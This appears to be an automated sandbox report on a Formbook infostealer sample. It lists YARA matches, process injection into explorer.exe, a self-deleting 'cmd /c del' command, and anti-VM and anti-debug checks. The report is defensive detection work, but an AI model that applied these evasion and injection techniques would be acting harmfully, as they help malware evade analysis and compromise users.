          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: String function: 0041A0A0 appears 50 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: String function: 00A6B150 appears 35 times
          Source: AQJEKNHnWK.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AQJEKNHnWK.exe, 00000000.00000003.207038845.000000001F036000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe, 00000001.00000002.257477540.0000000002A0E000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@14/5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | File created: C:\Users\user\AppData\Local\Temp\nsxFC19.tmp
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
          Source: AQJEKNHnWK.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: AQJEKNHnWK.exe | Virustotal: Detection: 18%
          Source: AQJEKNHnWK.exe | ReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | File read: C:\Users\user\Desktop\AQJEKNHnWK.exe
          Source: unknown | Process created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Process created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Process created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: explorer.pdbUGP source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AQJEKNHnWK.exe, 00000000.00000003.210067388.000000001F0E0000.00000004.00000001.sdmp, AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AQJEKNHnWK.exe, explorer.exe
          Source: Binary string: explorer.pdb source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Unpacked PE file: 1.2.AQJEKNHnWK.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00415047 pushad ; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041600E pushad ; retf
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00411254 push edi; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00414D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_2_00ABD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00415047 pushad ; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041600E pushad ; retf
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00411254 push edi; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 1_1_00414D4F push FFFFFFA9h; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_0498D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F5047 pushad ; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F600E pushad ; retf
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004F1254 push edi; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004FC2CD push ss; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_004FB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB46C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB40B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB402 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F4D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile created: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllJump to dropped file
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000004E85E4 second address: 00000000004E85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000004E897E second address: 00000000004E8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6156Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3252Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.241478036.0000000008907000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.236730090.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.227235190.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.229063771.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.237639933.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.229097394.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_740D1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_025B187C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_025B1664 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
